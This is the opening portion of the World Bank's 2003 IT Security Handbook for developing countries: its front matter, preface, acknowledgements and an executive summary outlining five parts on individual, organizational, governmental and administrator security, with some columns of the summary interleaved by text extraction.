IT-SECURITY
INFORMATION TECHNOLOGY SECURITY HANDBOOK

by George Sadowsky, James X. Dempsey, Alan Greenberg, Barbara J. Mack, Alan Schwartz

© 2003 The International Bank for Reconstruction and Development / The World Bank
1818 H Street, NW, Washington, DC 20433
Telephone 202-473-1000
Internet www.worldbank.org
E-mail feedback@worldbank.org

All rights reserved.

The findings, interpretations, and conclusions expressed herein are those of the author(s) and do not necessarily reflect the views of the Board of Executive Directors of the World Bank or the governments they represent. The World Bank does not guarantee the accuracy of the data included in this work. The boundaries, colors, denominations, and other information shown on any map in this work do not imply any judgment on the part of the World Bank concerning the legal status of any territory or the endorsement or acceptance of such boundaries.

This Handbook is distributed on the understanding that if legal or other expert assistance is required in any particular case, readers should not rely on statements made in this Handbook, but should seek the services of a competent professional. Neither the authors, nor the reviewers or The World Bank Group accepts responsibility for the consequences of actions taken by readers who do not seek necessary advice from competent professionals, on legal or other matters that require expert advice.

Rights and Permissions

The material in this work is copyrighted. Copying and/or transmitting portions or all of this work without permission may be a violation of applicable law. The World Bank encourages dissemination of its work and will normally grant permission promptly.

Portions of this publication have been extracted, with permission of the publisher, from Simson Garfinkel, Gene Spafford, and Alan Schwartz, Practical Unix and Internet Security, 3rd edition, © O'Reilly & Associates, Inc., February 2003, and Simson Garfinkel and Gene Spafford, Web Security, Privacy and Commerce, 2nd edition, © O'Reilly & Associates, Inc., January 2002.

For permission to photocopy or reprint any part of this work, please send a request with complete information to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, USA, telephone 978-750-8400, fax 978-750-4470, www.copyright.com.

All other queries on rights and licenses, including subsidiary rights, should be addressed to the Office of the Publisher, World Bank, 1818 H Street NW, Washington, DC 20433, USA, fax 202-522-2422, e-mail pubrights@worldbank.org.

Design: Studio Grafik, Herndon, VA

GLOBAL INFORMATION AND COMMUNICATION TECHNOLOGIES DEPARTMENT
THE WORLD BANK
1818 H STREET NW, WASHINGTON, DC 20433 USA
telephone 202.458.5153
facsimile 202.522.3186
email infodev@worldbank.org
website infodev.org

ISBN 0-9747888-0-5

INFORMATION FOR DEVELOPMENT PROGRAM

ACRONYMS

ICT  Information and Communication Technology
OECD DAC  Organization for Economic Cooperation and Development's Development Assistance Committee
MDGs  Millennium Development Goals
NGO  Non-Governmental Organization
WSIS  World Summit on the Information Society
DotForce  Digital Opportunity Task Force of the G8 states.
G8  Major industrial democracies have been meeting annually since 1975 to deal with the major economic and political issues facing their domestic societies and the international community as a whole. These states, the G8, comprise France, USA, Germany, Japan, Italy, Great Britain, Canada and, since the Birmingham Summit in 1998, Russia.
UN ICT Task Force  United Nations Information and Communication Technology Task Force
PDA  Personal Digital Assistant
SMEs  Small and Medium Enterprises
HIPC  Highly Indebted Poor Countries
FDI  Foreign Direct Investment
OECD  Organization for Economic Cooperation and Development
DFID  Department for International Development
ITDG  Intermediate Technologies Development Group
VoIP  Voice-over-Internet-Protocol

Information Technology Security Handbook

CONTENTS

1 PREFACE
7 EXECUTIVE SUMMARY

13 PART 1. INTRODUCTION
14 CHAPTER 1. IT SECURITY IN THE DIGITAL AGE

29 PART 2. SECURITY FOR INDIVIDUALS
30 CHAPTER 1. INTRODUCTION TO SECURITY FOR INDIVIDUALS
31 CHAPTER 2. UNDERSTANDING AND ADDRESSING SECURITY
35 CHAPTER 3. KEEPING YOUR COMPUTER AND DATA SECURE
43 CHAPTER 4. KEEPING YOUR OPERATING SYSTEM AND APPLICATION SOFTWARE SECURE
47 CHAPTER 5. MALICIOUS SOFTWARE
53 CHAPTER 6. SECURING SERVICES OVER NETWORKS
63 CHAPTER 7. TOOLS TO ENHANCE SECURITY
68 CHAPTER 8. PLATFORM SPECIFIC ISSUES
73 ADDENDUM 1. INTRODUCTION TO ENCODING AND ENCRYPTION
77 ADDENDUM 2. TCP/IP
79 ADDENDUM 3. MINI-GLOSSARY OF TECHNICAL TERMS

81 PART 3. SECURITY FOR ORGANIZATIONS
82 CHAPTER 1. INTRODUCTION
86 CHAPTER 2. OVERVIEW OF E-SECURITY RISK MITIGATION
94 CHAPTER 3. RISK EVALUATION AND LOSS ANALYSIS
101 CHAPTER 4. PLANNING YOUR SECURITY NEEDS
105 CHAPTER 5. ORGANIZATIONAL SECURITY POLICY AND PREVENTION
112 CHAPTER 6. PERSONNEL SECURITY
117 CHAPTER 7. SECURITY OUTSOURCING
122 CHAPTER 8. PRIVACY POLICIES, LEGISLATION, AND GOVERNMENT REGULATION
125 CHAPTER 9. COMPUTER CRIME
130 CHAPTER 10. MOBILE RISK MANAGEMENT
139 CHAPTER 11. BEST PRACTICES: BUILDING SECURITY CULTURE
144 CHAPTER 12. GENERAL RULES FOR COMPUTER USERS
150 CHAPTER 13. GLOBAL DIALOGUES ON SECURITY

163 PART 4. INFORMATION SECURITY AND GOVERNMENT POLICIES
164 CHAPTER 1. INTRODUCTION
167 CHAPTER 2. PROTECTING GOVERNMENT SYSTEMS
174 CHAPTER 3. THE ROLE OF LAW AND GOVERNMENT POLICY VIS A VIS THE PRIVATE SECTOR
176 CHAPTER 4. GOVERNMENT CYBER-SECURITY POLICIES

189 PART 5. IT SECURITY FOR TECHNICAL ADMINISTRATORS
190 CHAPTER 1. BACKGROUND
196 CHAPTER 2. SECURITY FOR ADMINISTRATORS
209 CHAPTER 3. PHYSICAL SECURITY
220 CHAPTER 4. INFORMATION SECURITY
238 CHAPTER 5. IDENTIFICATION AND AUTHENTICATION
266 CHAPTER 6. SERVER SECURITY
288 CHAPTER 7. NETWORK SECURITY
314 CHAPTER 8. ATTACKS AND DEFENSES
326 CHAPTER 9. DETECTING AND MANAGING A BREAK-IN
341 CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES

351 ANNEXES
352 ANNEX 1. GLOSSARY
362 ANNEX 2. BIBLIOGRAPHY
371 ANNEX 3. ELECTRONIC RESOURCES
378 ANNEX 4. SECURITY ORGANIZATIONS
384 ANNEX 5. PRINT RESOURCES

FOREWORD

The preparation of this book was fully funded by a grant from the infoDev Program of the World Bank Group. The topic of Information Technology (IT) security has been growing in importance in the last few years, and is well recognized by the infoDev Technical Advisory Panel. We would like to thank the State Secretariat of Economic Affairs of Switzerland (SECO) for having been instrumental not only in providing the funding for this project, but also in recognizing the urgency of the matter and allowing this book to come to fruition.

We recognize the fundamental role of Information and Communication Technologies (ICT) for social and economic development. Similarly, we recognize that there cannot be an effective use of ICT in the absence of a safe and trusted ICT environment. Thus, IT security plays a prime role in helping to create the environment needed to set the ground for implementing successful national ICT plans, e-Government or e-Commerce activities, as well as sectoral projects, such as, for example, in the areas of education, health, or finance.

IT security is a complex topic and evolves almost as fast as technology does. The authors have succeeded in providing technology-independent best practices, as well as recommendations for particular IT environments. As technology evolves, the accompanying web site (www.infodev-security.net) will provide updates as appropriate, allowing for a constant dissemination of developments in the field of IT security. While the opinions and recommendations made in this book do not necessarily reflect the views of infoDev or The World Bank Group, we believe that the combination of the book and its supporting web site will make a valuable contribution to the understanding of IT security around the globe.

The book is composed of five parts, each of which can be read independently. After an introduction to general issues of IT security, the book addresses issues relevant specifically to individuals, small and medium organizations, government, and technical administrators. Although most of the research and publications on IT security come from developed countries, the authors have attempted to provide practical guidance applicable anywhere and to include examples from developing countries.

We hope that this book and its supporting web site will provide the beginning of an interactive process, where the content and best practices will evolve over time as technology advances, but more importantly, as readers share their experiences and best practices with their peers.

Mohsen A. Khalil
Director, Global Information and Communication Technologies Department, The World Bank Group

Bruno Lanvin
Program Manager, infoDev Program, The World Bank Group

Michel H.
Maechler
InfoDev Task Manager, Senior Informatics Specialist, The World Bank Group

REVIEW COMMITTEE MEMBERS

Walter Duss, Vice President, swiss interactive media and software association (simsa); Managing Director, ASP Konsortium Switzerland, Wilen, Switzerland

Bertrand Livinec, CISA, Practice Lead, Sub-Saharan Francophone Africa Region, Group Risk Management Solutions (GRMS), PriceWaterhouseCoopers, Paris, France

Kurt Haering, President, EFSI AG, Basel, Switzerland (formerly President of Infosurance, Zürich, Switzerland)

Michel Maechler, CISA, CISM, Senior Informatics Specialist, Global Information and Communications Technology, Policy Division, The World Bank, Washington, DC, USA

Thomas Kellermann, CISM, Senior Data Risk Management Specialist, Financial Sector Operations & Policy Department, The World Bank, Washington, DC, USA

Scott Musman, President and CEO, Augmented Systems, Alexandria, VA, USA (formerly Director of Research and Development at IMSI)

Werner Lippuner, CISA, Senior Manager, Technology and Security Risk Services, Public Sector, Ernst & Young LLP, Washington, DC, USA

David Satola, Senior Counsel, Finance, Private Sector Dvt, & Infrastructure, Legal Department, The World Bank, Washington, DC, USA

PREFACE

The recent evolution of Information and Communication Technologies (ICTs) and the substantial innovation in the sector have resulted in a significant increase in productivity as well as the emergence of a wealth of new goods and services.

In the last 50 years, much has changed. The personal computer revolution which started in the mid-1970s has put computers of remarkable size and power into the hands of hundreds of millions of people at the present time. As the power, capacity, and cost of microelectronics continue to improve, providing a 30% gain, approximately, in productivity and power per unit of cost each year, we have all been beneficiaries of these trends. Today we live in a digital world, where information processing is inexpensive and telecommunications costs are decreasing. It is an increasingly interconnected world.

The wealth of new technical possibilities gives rise not only to new products and more efficient and effective ways of doing things, but also to the possibility of misuse of the technology. Like other technologies, ICTs are essentially neutral, and can be used in ways that most of us would consider beneficial, as well as in ways that are harmful. The work of ICTs is done at microsecond speed, carrying information invisible to the naked eye, under the control of software developed by people, so harmful intentions in this environment are often carried out rapidly, invisibly, and are difficult, if not impossible, to trace.

The problems associated with securing information systems, the processes that depend on them, and the information that is transmitted and stored in electronic form, are not new. Major commercial systems implemented on computers have been in existence for about 50 years. The commercial banking system has been executing electronic funds transfers for about the same amount of time. In these commercial systems, there are strong incentives for criminals to attempt to compromise both solitary computers and computer networks for personal gain. In reaction to the rise in opportunities for criminal activity, significant research and development initiatives have been launched to produce stronger security measures for both information processing and communications.

In addition, the Internet and other forms of personal networking have enabled computer-to-computer communications among many of those people. Twenty-five years ago computing and communications were generally handled by a small group of relative experts; today hundreds of millions of people use computers for every imaginable information-processing task. They are tied together by a powerful communications network, the Internet, that allows expanded interpersonal communication via e-mail and instant messaging. The Internet also provides easy and relatively inexpensive access to a rich and growing body of digital content. Yet with these rapid technology advances, trouble spots have emerged as well. The average networked computer user of the 1970s was a professional computer specialist; today the average user is fairly ignorant, or at least is unconcerned with the technical details involved with the operations of the computer and its network. As a result, these casual users may fail to put proper security software packages and procedures in place, so that weak links in the network may be exploited by hackers or computer criminals, regardless of the respective geographical locations of the user, the exploiter, and the system being exploited.

If you use computers at home or at work, you have a certain level of responsibility for them and this publication will help you understand the procedural and technical details of managing either a single computer or a networked group of computers. Security is everyone's business, whether you are a casual user, a technician, a system administrator, a network administrator, or a manager with responsibility for systems or networks. Understanding what the central security issues are, taking prudent actions to protect your systems, and putting a set of effective security policies in place are critical steps you must take to ensure that your machines and information will be secure from unauthorized access and that you will be able to exchange that information securely with others on the network.

This Handbook is being prepared during a time of excitement about the potential of ICTs in furthering economic and social development. While ICTs have been used for 40 years or more in many sectoral projects implemented by multilateral and bilateral aid agencies, the notion that ICTs are a critical crosscutting theme for many development initiatives is relatively new, dating back to the rise of the Internet in the early 1990s. This concept was first formalized in a multilateral agency by the infoDev Program at the World Bank Group in 1995, and was supported by the strong vision that its President, James Wolfensohn, projected on the importance of knowledge sharing for economic and social development. Since that time, optimism in the development community has run high, fed in part by the enthusiasm generated by technological developments embodied in low-cost PCs and the World Wide Web.

In 2001, the G-8 countries established the Digital Opportunity Task Force (DOT-Force). The DOT-Force presented the conclusions of its work in a report and proposed the nine-point Genoa Plan of Action, both of which were fully endorsed by G8 Leaders at their 2001 Genoa Summit. The original membership of DOT-Force includes stakeholders from the G8 and developing country governments, the private and not-for-profit sectors, and a range of international organizations.[1] The report presented seven action points as critical issues for creating the information society:

1) policy support;
2) improved access;
3) human resource development;
4) cultivation of entrepreneurs and entrepreneurial activity;
5) participation by developing countries in international conferences in IT;
6) IT for health; and
7) local content and applications.

One outcome of the report was the creation of the United Nations Secretary General's ICT Task Force. Another was the creation of the Global Digital Opportunities Initiative, sponsored by UNDP, the Markle Foundation, and Accenture. Bilateral aid agencies gave increased attention to ICT in their development plans. The ITU and UNESCO made plans to host a series of two global summit meetings, the World Summit on the Information Society (WSIS), in Geneva (December 2003) and in Tunis (April 2005).[2]

ICTs have the potential to support, in an indirect manner, many activities aimed at achieving the Millennium Development Goals (MDGs).[3] Responsible IT security policies and implementation in a country will encourage the flow of foreign direct investment into that country. These flows will assist in financing the extension of a secure infrastructure that will allow ICT to contribute to these goals.

It's appropriate to ask why a publication such as this, written primarily for readers in developing countries, is needed. After all, the principles of security are the same, whether you are in a developed or a developing country. The technology is similar and the threats can come from any part of the world, no matter where you are located. A great deal of material has already been written about computer and network security and is available, although not always conveniently or cheaply, in developing countries.

First, it is important to remember that computer users and administrators in developed countries and regions have abundant access to technical and user information that assists them in their work. Bookstores and libraries are plentiful. Many technically skilled people use computers, so advice and assistance from peers is easily obtained. When computer or network problems arise, such as the spread of a virus, there is a rich set of information channels through which news and security patches are transmitted. Organizations using computers and networks have help centers staffed by technical specialists who are alert to the possibilities of misuse and make efforts to protect their organization's resources.

[1] About the DOT-Force, http://www.dotforce.org/about/, para 1.
[2] Information about summits, regional conferences and other events of the WSIS is available at: http://www.itu.int/wsis/
[3] See the UN Secretary General's Report on Implementation of the UN's Millennium Declaration, which is available as a pdf file on the MDG website: http://www.un.org/millenniumgoals/

Users and technical administrators in developing countries often lack such support. The density of users is low, so anecdotal evidence that may contain warnings and solutions is lacking. Organizations using computers are often so short-staffed that they cannot afford to monitor and support their internal technical resources sufficiently. Many times, basic precautions are not taken because the underlying knowledge of computer systems and network security is insufficient. For groups that understand the basics, there may be gaps in understanding how to adapt general technical guidelines to diverse and ever-changing circumstances in the field. Vendor support, which was abundant in past years when only a few large and expensive computers were purchased, simply does not exist at the mass level at the present time. Computer stores and repair services are often unaware of problems affecting other parts of the world. As a result, users and administrators are victims of information poverty in IT security, an area where they should be well informed and up-to-date.

Failures in security occur in all countries and some breaches are made public in the press or through various electronic means. Many failures are not reported, however, in part because of embarrassment and in part because public knowledge of the failure could lead to further intrusions and unwanted results. Organizations and governments in developed countries can generally withstand some level of security failure. However, the consequences of security failures in developing countries could be considerably more serious than in the developed countries. It is our belief that businesses, organizations, and governments in developing countries do not have the same degree of resiliency to recover from such failures, because lack of awareness may lead to more massive breaches and because a malicious attack may be more catastrophic, in terms of money, reputational and psychological effects (loss of trust), and the time required to fix the problems, if they are reparable at all.

Developing countries should regard security as a top priority, for the opportunity costs of not doing so may be very high indeed. For example, criminal activity will migrate to places where controls are poor and security is weak. E-commerce and e-business activities are likely to make interesting targets in countries that are less conscious of IT security. What small or medium size business could survive an erasure of its electronic business files, theft of its confidential customer data, or an accidental or deliberate alteration of key business information? Developing countries need to build capacity in terms of trained human resources and in terms of the technological infrastructure that will protect them from being easy targets of hackers and computer criminals.

In preparing this publication, we have had considerable discussion of what the title should be, in part because there are various views regarding what needs to be secured. Persons concerned with content tend to view this as an information security issue. Others, concerned with the technical mechanisms for storing and transmitting information, may view it as a system and network security issue. Still others may view it as an extension of e-business and think of the area as e-security.

We have chosen to think of this set of issues under the umbrella of information technology security. By this we mean to include all of the mechanisms for storing, processing and transmitting information, including hardware, software and communications facilities, but with an equal focus upon the security of the information itself. It is important that both the information and the mechanisms that process it in any way be secure from compromise.

We have, however, intentionally limited the focus of this publication to computers, software, and networks, realizing that there is a rich set of issues in the area of fixed line and mobile telephony that have not been addressed in detail here. As the convergence of telephony and computers continues, these issues are likely to become more important. With the emergence of voice over IP and ENUM, digital telephony protocols that are increasingly used, and the emergence of 3G technologies, there are clearly security issues in this space that will need to be understood and addressed.

This publication has been created so that it can be provided to the developing world without cost, thanks to a farsighted collaboration between the State Secretariat for Economic Affairs of the Government of Switzerland and the infoDev program managed by the World Bank. The goal is not only to achieve wide distribution of the hardcopy version of the publication, but also to provide its contents on a universally accessible web site. This web site will be dynamic in two ways. First, the site's content will be updated as needed to make it current, applicable, and effective for readers in developing countries. Second, the web site will include, as appropriate, contributions from readers who provide material that assists in the evolution of the site/handbook and that offers additional guidance to those seeking information on IT security.

The following material is organized into five parts, each of which is oriented to specific groups of readers. Observant readers will notice that there is occasionally significant repetition across parts. This is intentional, since we believe that many readers will select and read only those parts that they believe are relevant to them. Some of the parts, notably the part describing security and the individual, could possibly be extracted and distributed independently to individual computer users who might well have no need of any of the other parts.

In preparing such a publication, we have had to balance the need to impart general principles with specific examples and practical information. We hope that the balance represented here is approximately correct. However, as the technology evolves and matures, the technical details are going to change. The principles, if well chosen, are likely to be invariant, so that the reader should work toward an understanding of the principles, both on the policy and management side and on the technical side. If the principles are well understood, then the technical solutions will always be discoverable for implementation.

The reader will note that the authors of the Handbook have used several different terms to refer to security and computing. In general, we have referred to IT security, as it can serve as an umbrella for:

1) computer security: security in a technical context: machines, software, data, and networks. The term "computer security" is commonly used in Part 2 and Part 5, as these Parts are focused on the physical, infrastructural, and technical aspects of IT security, and

2) cyber-security: IT security in a government/public policy context. The term "cyber-security" is commonly used by government agencies and public policy makers in documents, legislation, and research projects. It is more or less synonymous with the term "Internet security," a term that we do not use in this Handbook, but which is sometimes used in other publications. Both terms focus on the network aspects of security and the policy implications of a networked world, including issues in privacy, crime, commerce, and global communications. The line between these terms is not sharp; as we have seen in many chapters of this Handbook, the security of your computers, networks, and data is critically intertwined with the more ephemeral concept of security in cyberspace. The term "cyber-security" appears often in Part 4.

In a fast moving technical environment, the reference material in these annexes risks becoming out of date soon after it is published. In order to make this a living document, all of its sections can be found on the web site www.infodev-security.net and each section will be updated periodically with additional useful information, with the date of last update at the bottom of each page. Readers who would like to recommend material to be used for updating the document on the web are encouraged to do so by sending suggestions via e-mail to contact@infodev-security.net.

This Handbook would not have been possible without the support and dedication of a number of key individuals and institutions.

Simson Garfinkel deserves special recognition for his early guidance in critiquing the initial structure of the publication. He further assisted in helping to identify and assemble part of the team to prepare the Handbook. The publication would not have been possible without his advice and assistance.

Bruno Lanvin, Manager of the infoDev Program of the World Bank Group, deserves substantial credit for understanding the relevance and power of knowledge creation and distribution in the field of ICT. His support in the production of this publication has been reassuring and welcome. He has been ably assisted by his colleagues Jacqueline Dubow, Ellie Alavi, Teri Nachazel and Henri Bretadeau of the infoDev staff.

We are extremely grateful to Tim O'Reilly, who provided access to the material contained in two important books published by his company, O'Reilly & Associates: Practical Unix and Internet Security, 3rd edition (Simson Garfinkel, Gene Spafford, and Alan Schwartz, O'Reilly & Associates, Inc. 2003) and Web Security, Privacy & Commerce (Simson Garfinkel with Gene Spafford, O'Reilly & Associates, Inc. 2002). These books were used to develop significant parts of this Handbook and a number of sections have been reprinted with permission from these authors and the publisher.

In addition, for the last ten years, O'Reilly & Associates have donated tens of thousands of technical books to people from developing countries who have attended training workshops run by the Internet Society and similar organizations. Readers who have observed the state of libraries and access to published material in the developing world will understand how significant O'Reilly's contribution is towards the ability of these countries to introduce, spread, and exploit the Internet in their countries and thereby reduce the digital divide.

We want to warmly thank the authors of the above O'Reilly books, Simson Garfinkel, Alan Schwartz, and Gene Spafford, for their able and willing assistance in making the material in the above books suitable for use for parts of this Handbook. Their spirit of willingness to help exemplifies the best that is in the original Internet culture of professional cooperation and information sharing.

We also thank Tom Kellermann, Senior Data Risk Management Specialist in the Integrator Group and Treasury Security Team of the Operations Policy Department at The World Bank for his advice and support. His materials on e-finance, blended threats, and mobile risk management have been particularly valuable to the team and are reflected frequently in Part 3 of this Handbook.

Max Schnellmann, Switzerland's representative to the infoDev Donor's Committee meeting in Chongqing, China in December 2002, was among the first to realize that an IT security handbook would be extremely useful in developing countries. His persistence in obtaining the support of the Swiss Government for the infoDev project to produce this Handbook was absolutely essential, and his personal support for the idea of the Handbook has carried us forward over the past year.

Michel Maechler assembled an energetic and able set of experts to review drafts of this material. Together they made many valuable suggestions that contributed to the accuracy, readability, and relevance of the final version of the publication. We are grateful for their collective experience and for their constructive guidance.

We would like to express our gratitude to all of these people for their assistance and support in preparing the first version of this document.

This Handbook is not intended to be a tutorial on Unix, Windows, or Macintosh platforms, nor is it a system administration tutorial. Use this Handbook as an adjunct to tutorials and administration guides. Managing wide-scale changes in computer systems may make them more difficult to maintain, even though the changes are needed to provide better security overall. For the convenience of the readers, we have referred to many respected online resources. However, as readers consider using programs and suggested fixes posted on the Internet, caution should be exercised. It can be challenging to evaluate the overall security impact of changes to your system's kernel, architecture, or commands. If third party patches and programs are routinely downloaded and installed to improve system security, overall security may worsen in the long term. Attention must be paid to compatibility with system requirements and the quality and reputation of the companies offering programs and advice. We hope that this Handbook will make these tasks easier and we trust that our readers will help us refine this text over time.

EXECUTIVE SUMMARY

Information Technology Security Handbook is a practical guide to understanding and implementing IT security in your home or business environment. It has been written primarily for readers in developing countries, although the Handbook provides best practices valid in any situation. In addition to summarizing current physical and electronic threats to IT security, the Handbook also explores management practices, regulatory environments, and patterns of cooperation that exist among businesses, governments, professional associations, and international agencies today. The Handbook is structured in five Parts that may be circulated individually, though the greatest benefits will be obtained by reviewing the document in its entirety. This Executive Summary will cover the main themes of the Handbook and will offer a brief mapping of each Part in "Highlights from the Handbook."

Adoption of ICTs Is on the Rise...

The Handbook begins with an overview of the growth of the Information Communication Technology (ICT) sector, as we know it today. This growth includes individual users of ICTs, as reflected in the rise in the number of home networks and growth in the small and medium sized enterprise sector which relies on computing resources in support of non-technical business endeavors (restaurants or retail shops, for example) and in businesses that are tightly linked to technology development and deployment around the world (small software firms or technology outsourcing service providers, for example).

Yet Knowledge of IT Security Practices Lags Behind

While the expansion of the market for technology products and services has been dramatic at the individual and the organizational level, knowledge of IT security issues has lagged behind. Individual users may not be aware of the risks involved with surfing the Internet on their home computer. If they do recognize the dangers of unprotected networking, they may still postpone learning about firewalls, virus scanners, encryption, and regular maintenance due to the perceived financial costs, time investment, or disruption of their current computing behavior. Small and medium sized organizations may also delay securing their systems for these reasons; in addition, they may deploy a technical solution, such as a firewall, but may not take a layered approach to security, without which their defense perimeter will still be weak. SMEs may neglect to put clear security policies and procedures in place for managers and employees to follow. If communications, awareness, and training are lacking throughout the organization, the technological defenses could be compromised quite easily through negligence before actively malicious behavior was even a factor.

Technology in a Changing Environment: Mobile Devices, Emerging Applications, and Blended Threats Create Complexity

New and inexperienced users are not the only cause of IT security breaches at the present time. The ICT environment is also changing rapidly with the introduction of new products, especially mobile devices (laptops, cellular phones, and Personal Digital Assistants, for example) that present different challenges to infrastructure and data security. Emerging computing applications including e-finance and e-commerce also create complexity in the networked environment. From ATM machines to online banking, these capabilities offer convenience and cost savings, but they also introduce new opportunities for theft and fraud. To make matters worse, would-be attackers are now able to develop blended threats: combinations of viruses, worms, and Trojans that may cause greater damage to systems and data than the individual forms of such "malware" can cause alone. Since all of these developments affect the users of technology worldwide, the best solutions will come through international cooperation.

International Cooperation and Security in the Developing Country Context

IT security is a critically important issue for developing countries. It is well understood that the Internet offers opportunities for communications and commerce that were hardly imaginable ten years ago. Though access is not always cheap, the Internet enables users to view a tremendous variety of content, and people connect via e-mail far more efficiently than they could through traditional postal services. The Internet has also affected international trade frontiers; businesses in developing countries may now offer their goods and services online. Although the market may still be crowded with competitors, at least prospective customers can find information about companies, their capabilities, and their products without having deep local knowledge. While the potential for businesses to reach across geographic borders

Awareness of general IT security issues, including the existence and prevalence of specific security threats, will help users, managers, and policy makers design effective strategies to strengthen their networks, at home and at work, against breaches.

Highlights for Part 2. IT Security for Individuals

Part 2 of the Handbook is aimed at individuals who use computing and networking resources for a variety of purposes, whether they are at home or in an office environment. This part may also be relevant for small organizations that cannot fully address IT security policy and its administration at an organizational level. It explains principal security issues for individual users and offers guidelines on techniques that will minimize the threat of a security penetration (if they are properly employed).
is exciting, it will take a significant amount of international cooperation to sustain the vision Some of the issues and techniques described in Part 2 of a productive, globally networked world. include: · why computer and network security are necessary; the impact of security breaches; I. HIGHLIGHTS FROM THE · physical security, backups, and authentication HANDBOOK: IT SECURITY FOR through usernames and passwords; DEVELOPING COUNTRIES · the various forms of malware (malicious software) and how they spread; Highlights for Part 1. · how e-mail and the Internet work and why they are a IT Security in the Digital Age vehicle for computer attacks; · software tools including virus checkers, firewalls and Part 1 of the Handbook provides an introduction to remote access tools; the general issues of security in an electronic age. · more advanced concepts such as TCP/IP networking While people have always been concerned about and encryption, for the interested user. security issues, the advent of computers and networks has changed the terrain in a manner in subtle ways. Part 2 covers these security issues and mitigation tech- This section describes the scope of IT security issues, niques in technical detail, with the individual user in explains several types of malicious behavior with respect mind; Part 3 looks at security from an organizational to computers and networks, and outlines the risks of perspective. operating without adequate security measures in place. Highlights for Part 3. Chapters of Part 1 include: IT Security for Organizations · The Digital Revolution · Defining Security Part 3 of the Handbook addresses the administrative and · Emergence and Growth of the Internet policy aspects of security from an organizational point · Overview of Security Issues of view. 
Good security policy and its effective implmen- · Perpetrators of Attacks on IT Security tation minimize the risk of accidental and deliberate Information Technology Security Handbook EXECUTIVE SUMMARY 9 losses, makes intrusions more difficult, and provides the Highlights for Part 4. tools to identify attacks and to repair security breaches. IT Security and Government Policies Such a combination of policy and implementation should aim to protect confidential data and help to Part 4 of the Handbook addresses security issues that assure the integrity of the programs and the data that need to be understood and handled at the governmental are stored and transmitted over the network. This part level. In addition to securing its own information covers the elements of effective security policy for a assets, a government has an obligation to set policy for range of organizations, including businesses, securing the national information infrastructure; governments, universities, and community, this policy has an important role to play in the or non-profit organizations. promotion of IT security. There is a paradox, however: a sound public policy framework can enhance security, Part 3 covers the following subjects in detail: but ill-considered government regulation can do more · the eight pillar approach to security, particularly harm than good. Technology is changing so rapidly valuable in a financial services or transaction-based and new cyber threats are emerging with such swiftness environment; that government regulation can become a straitjacket, · security risk evaluation and loss analysis in a busi- impeding the development and deployment of innova- ness context; tive responses. It is important therefore to achieve the · policy and procedural issues to consider during the right balance of regulatory and non-regulatory measures. 
security planning process; Clearly, government cyber-security policies must take · the role of management in ensuring computer, net- into account the technical and social characteristics of work, and data security; the Internet. Within this context, governments can take · personnel security: training and awareness, the hiring a range of steps to improve computer security, without process, and outsourcing the security function; interfering with technical design decisions.4 · computer crime, incident reporting, and recovery; · wireless technologies and emerging security threats Part 4 contains an in-depth discussion of the to the enterprise; following subjects: · additional guidelines and checklists aimed at design- · the communications network and other critical ing and implementing a strong organizational infrastructures that are owned and operated by the security practice. private sector, but regulated by the government; a picture of mutual dependency; Part 3 also provides an overview of public policies · the government's general role and responsibilities in that are directly related to business, non-profits, promoting sound computer security practices in the and government operations in a networked world and public, private, and non-profit sectors; concludes with excerpts from the World Bank's "Global · computer crime laws that must protect both government Dialogues" on IT security. Part 4 contains a deeper and privately-owned computers and networks; discussion of regulatory and public policy issues · traditional concepts of legal liability translated to the in "cyberspace" and examines these issues in an computer context; international context. 
· laws, regulations, and government policies that are focused on promoting computer security in areas of consumer protection, data and communications privacy, and frameworks for e-commerce; and 4The following discussion draws upon the detailed surveys compiled by the American Bar Association's Privacy & Computer Crime Committee: Jody R. Westby, ed., International Guide to Combating Cybercrime, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003, http://www.abanet.org/abapubs/books/cybercrime/; Jody R. Westby, ed., International Strategy for Cyberspace Security, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003. See also International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 10 EXECUTIVE SUMMARY · legal and policy models from a number of countries being used to offer information services (servers) and references to resources in relevant international and how to build servers that minimizes these organizations. problems; · network security from the hardware side (modems, Part 4 evaluates security from legal and public policy routers, and wireless access) to the software side perspectives. Part 5 takes a deeper look at the technical (TCP/IP, the dominant networking protocol on local means and procedures required to secure IT resources. area networks and the Internet); · the techniques that are used to attack workstations Highlights for Part 5. and servers, namely denial of service attacks, IT Security for Technical Administrators programmed threats, and social engineering; · how to use auditing, logging, and forensics to Part 5 is aimed at helping system and network help detect compromises and identify what's been \administrators perform their duties efficiently. 
modified on a compromised system; and finally, It covers security issues that need to be understood · technical recommendations that are specific to and addressed at a technical and managerial level, with Unix/Linux, Microsoft Windows, and MacOS 7-9 examples of how security breaches occur and advice on operating systems, MacOS X is covered by the how preventive measures may be taken. Other parts of Unix material. the Handbook covered an overview of the current com- puting environment, security for the individual user, Due to the volume and complexity of the material, security from an organizational standpoint, and the several annexes have been provided. Annex 1 contains legal and public policy implications of security risks and a Glossary of terms commonly used in information prevention. Part 5 explains in greater detail the specific technology and communication. Annexes 2-5 contain threats to security, including the various methods of a bibliography of references to security resources. These attack that are used to penetrate systems and program, sources include print resources, electronic resources, and the methods of monitoring critical systems and network a listing of organizations that focus on security issues. traffic so that attempted intrusions can be detected, the All readers of the Handbook are encouraged to learn best practices in securing such systems, and the appro- more about specific topics by referencing priate way to handle a security incident when a breach the items in the bibliography. has occurred. II. FUTURE STEPS AND Part 5 handles the following issues, with the systems CONCLUSIONS administrator in mind: · the design of secure systems and the methods of Digital technology provides us with exciting new tools system attackers; that can have a major impact on education, health, · the varied threats to IT security from environmental commerce, and other sectors of civil society. 
